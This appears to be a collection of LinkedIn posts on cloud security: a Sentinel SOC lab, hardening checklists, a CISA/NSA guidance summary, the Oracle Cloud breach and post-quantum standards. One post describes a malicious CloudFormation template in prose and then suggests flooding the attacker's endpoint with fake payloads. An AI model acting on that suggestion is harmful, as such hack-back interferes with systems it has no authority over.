Cloud Security

I recently built a cloud-based SOC lab at home using Microsoft Azure and Sentinel. The goal was to simulate a real-world environment to monitor brute-force attacks in real time. I deployed a Windows VM, deliberately exposed it to the internet, and configured Sentinel to ingest and analyze security events. Using KQL (Kusto Query Language), I filtered failed login attempts and linked source IPs to geolocation data via a watchlist. The result: a live, map-based visualization of attack sources from around the world. This was a hands-on way to better understand log analytics, threat detection, and how SIEM tools operate in practice. 🔗 https://lnkd.in/gGjGzpad Inspired by Josh Madakor's tutorial 👏 #Azure #MicrosoftSentinel #SOC #SIEM #KQL #Cybersecurity

This EY incident underscores a truth we often overlook: the most common cloud vulnerability isn't a zero-day exploit; it's a configuration oversight. A single misstep in cloud storage permissions turned a database backup into a public-facing risk. These files often hold the "keys to the kingdom" ie. credentials, API keys, and tokens that can lead to a much wider breach. How do we protect ourselves against these costly mistakes? Suggestions 1. Continuous Monitoring: Implement a CSPM for 24/7 configuration scanning. CSPM is Cloud Security Posture Management -> a type of automated security tool that continuously monitors cloud environments for misconfigurations, vulnerabilities, and compliance violations. It provides visibility, threat detection, and remediation workflows across multi-cloud and hybrid cloud setups, including SaaS, PaaS, and IaaS services 2. Least Privilege Access: Default to private. Grant access sparingly. 3. Data Encryption: For data at rest and in transit. 4. Automated Alerts: The moment something becomes public, you should know. 5. Regular Audits: Regularly review access controls and rotate secrets.

🚨CISA & NSA release Crucial Guide on Network Segmentation and Encryption in Cloud Environments🚨 In response to the evolving requirements of cloud security, the Cybersecurity & Infrastructure Security Agency (CISA) and the National Security Agency (NSA) recently released a comprehensive Cybersecurity Information Sheet (CSI): "Implement Network Segmentation and Encryption in Cloud Environments." This document provides detailed recommendations to enhance the security posture of organizations operating within cloud infrastructures (that probably means you). Key Takeaways Include: 🔐 Network Encryption: The document underscores the importance of encrypting data in transit as a defense mechanism against unauthorized data access. 🌐 Secure Client Connections: Establishing secure connections to cloud services is fundamental. 🔎 Caution on Traffic Mirroring: While recognizing the benefits of traffic mirroring for network analysis and threat detection, the guidance cautions against potential misuse that could lead to data exfiltration and advises careful monitoring of this feature. 🛡️ Network Segmentation: Stressed as a foundational security principle, network segmentation is recommended to isolate and contain malicious activities, thereby reducing the impact of any breach. This collaboration between NSA and CISA provides actionable recommendations for organizations to strengthen their cloud security practices. The emphasis is on strategically implementing network segmentation and end-to-end encryption to secure cloud environments effectively. Information security leaders are encouraged to review this guidance to understand better the measures necessary to protect cloud-based assets. Implementing these recommendations will contribute to a more secure, resilient, and compliant cloud infrastructure. Access the complete guidance provided by the NSA and CISA to fully understand these recommendations and their application to your organization’s cloud security strategy. 📚 Read CISA & NSA's complete guidance here: https://lnkd.in/eeVXqMSv #cloudcomputing #technology #informationsecurity #innovation #cybersecurity

If you’re new to Security Engineering, you’re likely: – relying on “default” cloud configs – skipping threat modeling and risk reviews – ignoring logging, audit trails, or alert fatigue – underestimating insider threats and privilege creep – forgetting to patch dependencies and container images Follow this simple 27-rule Security Engineering Checklist to protect your org and avoid rookie mistakes. 1. Never deploy to prod without a full security review and automated vulnerability scan. 2. Patch everything, OS, dependencies, containers, on a regular schedule, not just when an incident hits. 3. Rotate all secrets and keys regularly, and store them in a dedicated secrets manager. 4. Enforce strong, unique passwords everywhere. Disable password reuse. 5. Require Multi-Factor Authentication (MFA) for all privileged and production accounts. 6. Limit permissions by default: start with zero trust, use least privilege everywhere. 7. Set up Role-Based Access Control (RBAC) and review roles/permissions every quarter. 8. Segment networks, no flat internal networks. Isolate prod, staging, and dev completely. 9. Encrypt data everywhere: at rest, in transit, and (where possible) in use. 10. Enable detailed audit logging on all critical systems, APIs, and cloud resources. 11. Review audit logs regularly, don’t just store them, analyse for anomalies. 12. Use Infrastructure as Code (IaC) to standardise, version, and review every config change. 13. Scan all Infrastructure as Code and container images for security misconfigurations and vulnerabilities. 14. Run regular external and internal penetration tests, don’t trust just compliance scans. 15. Threat model every major new system or feature before shipping to production. 16. Validate and sanitise all user inputs, never trust client-side validation alone. 17. Protect public endpoints with WAFs, API gateways, and rate limiters. 18. Require code reviews for all security-sensitive code paths. 19. Never expose internal services directly to the internet, use proxies, firewalls, and allowlists. 20. Monitor for unusual authentication, privilege escalations, and lateral movement. 21. Use endpoint protection and EDR (Endpoint Detection & Response) on all corporate devices. 22. Run simulated phishing campaigns and red team exercises, not just annual security training. 23. Automate alerting for critical events, disable noisy, low-signal alerts to avoid alert fatigue. 24. Enforce secure backups, encrypt, store offsite, and regularly test restore. 25. Require explicit approval and justification for opening firewall ports or changing access. 26. Document every system’s security controls, incident history, and responsible owner. 27. Never treat security as “done”, review, improve, and iterate after every incident and audit. --- Found this useful? Repost it. Follow saed ‎for more & subscribe to the newsletter: https://lnkd.in/eD7hgbnk I am now on Instagram: instagram.com/saedctl say hello 👋

I've set up hundreds of AWS accounts for clients over the years. Here's your essential checklist when starting a new AWS account: 1. Delete default VPC, create a custom one 2. Set up budget alerts 3. Enable CloudTrail logs 4. Configure strong password policy 5. Enforce MFA for all users 6. Enable AWS Resource Explorer 7. Set up IAM roles and least privilege access 8. Enable AWS Security Hub for centralized security management 9. Implement tagging strategy for cost allocation 10. Enable AWS Organizations for multi-account strategy These steps establish a robust foundation for security, cost management, compliance, and scalability. Pro tip: Automate this process with Infrastructure as Code (IaC) tools like AWS CloudFormation, AWS CDK or Terraform. It ensures consistency and saves time on future setups. Which of these do you prioritize? Any crucial steps I missed? Share your thoughts!

A few months ago, we found a malicious AWS CloudFormation template trying to breach a customer's AWS account. It was disguised as “AWS Support for Fargate” Here’s what it’s really up to: 1. Grants itself administrator-level permissions via a fake support IAM role 2. Deploys a lambda function (in-line) to exfiltrate role ARN to an external API Gateway endpoint 3. Invoke itself using AWS CloudFormation CustomResource 📘 Blue team tips - Always review the IAM roles, policies, and external calls in any template. - Use the IAM Access Analyzer to verify external trust relationships - Don’t blindly trust anything labeled “AWS Support” — verify it first! - Report to AWS Security teams ASAP 📕 Red team tips - The malicious actor is identified by the AWS account ID in the AssumeRole policy. - Consider flooding the API endpoint with randomly generated payloads using fake IAM role ARNs.

Planning to get into Cloud Security? Here are the most commonly used services: Cloud security services may look different in AWS, Azure, and GCP at first glance. But the core security functions are almost identical. This visual breaks down the cloud security services teams use daily across all three major cloud providers. Let’s dive in 👇 🔐 Identity and access control → Every cloud starts with identity. AWS IAM, Azure Entra ID, and GCP IAM control who can access what, enforce least privilege, and investigate access issues. Most cloud breaches start with identity misconfigurations, not exploits. 📊 Logging and visibility → CloudTrail, Azure Monitor, and Cloud Logging record everything that happens in your environment. These services are the backbone of investigations, audits, and incident response. No logs means no proof and no visibility. 🚨 Threat detection and posture management → GuardDuty, Defender for Cloud, and Security Command Center detect suspicious behavior, misconfigurations, and risky patterns. They help teams move from reactive security to continuous monitoring. 🌐 Network protection and segmentation → Security Groups, NSGs, VPC Firewall Rules, WAFs, and Cloud Armor control traffic and block attacks before they reach workloads. This is how cloud teams reduce blast radius and prevent lateral movement. 🔒 Encryption and key management → KMS, Key Vault, and Cloud KMS protect sensitive data at rest and in transit. Encryption is useless without proper key control, rotation, and access restrictions. 🧩 Centralized security visibility → Security Hub and Secure Score aggregate findings across services and accounts. This is how teams track posture, prioritize fixes, and prove compliance at scale. 📚 Final Thoughts Different cloud names, same security goals. If you understand these core services, you can transfer cloud security skills across AWS, Azure, and GCP with confidence. 🔁 Share with someone learning cloud security! 💾 Save or screenshot this so you don’t forget. #CloudSecurity #AWSSecurity #AzureSecurity #GCPSecurity #CyberSecurity

You've probably seen the news: Oracle Cloud got popped, exposing 6 million records from over 140,000 tenants. The breach came to light after user "rose87168" dropped the loot on Breach Forums. The alleged attacker disclosed to Bleeping Computer that they used a known vulnerability to hit Oracle Cloud's SSO endpoint at login.<region>.oracle.com. Chances are, it was either CVE-2021-35587 or CVE-2022-21445. Both issues were discovered and reported by our very own Đức Nguyễn, together with Jang Nguyen, who's also joined our red team on many fun adventures. Duc found the bugs before he even joined the team. As Duc explained in his blog (link in comments), these are monster bugs, affecting a wide swath of Oracle products and companies. During their research, Jang and Duc even managed to pwn multiple systems under oracle.com, including the SSO endpoint at login.oracle.com (see the picture below). In 2023, we used the same vuln to compromise an Oracle BI instance buried deep inside a bank during a beautiful money heist simulation. Oracle products are notoriously complex, and Oracle is not exactly famous for fast patching. It took them more than six months to fix CVE-2021-35587 and CVE-2022-21445. Some deprecated product lines never got patches at all. As a result, many Oracle systems are left outdated and vulnerable. At this point, if you're running Oracle, it's probably safer to assume you're already breached, and plan your defense accordingly.

What a surprise for the EU 😱 😉 A recently published expert opinion commissioned by the German Federal Ministry of the Interior has sparked a pivotal discussion on data governance and sovereignty. According to the report, US authorities can exert far-reaching access rights to cloud data managed by US-based companies, even when that data is stored in European data centers and administered through local subsidiaries. This is because legal instruments such as the Stored Communications Act extended by the Cloud Act and Section 702 of FISA focus on the provider’s control, not the physical location of the servers. This finding is a firm reminder that simply hosting data on European soil does not guarantee protection from extraterritorial legal claims. It reveals structural risks in relying on dominant foreign cloud providers for sensitive data and critical digital infrastructure. For Europe to truly uphold its data protection principles and strategic autonomy, the conversation must go beyond compliance checklists and contractual assurances. We need stronger investment in #opensource digital infrastructure and indigenous technologies that reduce dependency on non-European platforms. Open source fosters transparency and auditability while enabling communities and businesses to build on systems that are not bound by foreign legal systems. If #digitalsovereignty is to mean more than a buzzword, we must accelerate our efforts towards resilient, interoperable, and locally governed alternatives. Only then Europe can ensure that its data is governed by the laws and values that its citizens and organisations expect. Source: https://lnkd.in/dtpXiwYN

Last week #NIST released three post-#quantum #encryption standards. Why is this significant? Put simply, from a practical standpoint: risk management and compliance. First, on risk management: experts now say that quantum computing is less than a decade away. Quantum computers are expected to have the power to search large keyspaces very quickly, which means they will be able to decrypt current encryption. Moreover, it is entirely plausible that encrypted information recorded today is being stored for decryption when quantum computing becomes available. If you speculatively apply quantum-resistant encryption to your data now, you will reduce the risk of an adversary being able to successfully exploit your data when they have access to quantum computing. Second, on compliance: NIST is the governing body for standards in the USA, and many other nations take their encryption standards from NIST, as they do not have resources at the same scale as NIST. You can be certain that NIST-approved post-quantum algorithms will start being mentioned in various compliance checklists, as is the case currently with algorithms such as AES-256 and SHA-256. Note well that these algorithms have #FIPS numbers associated with them - meaning "Federal Information Processing Standard". Briefly, the approved algorithms are: 🔒 ML-KEM, for encrypted key exchange, as FIPS 203 🔒 ML-DSA, for digital signatures, as FIPS 204 🔒 SLH-DSA, for stateless hash-based digital signatures, as FIPS 205 There is a fourth algorithm, FN-DSA, also used for digital signatures, that is expected to be released in the next year.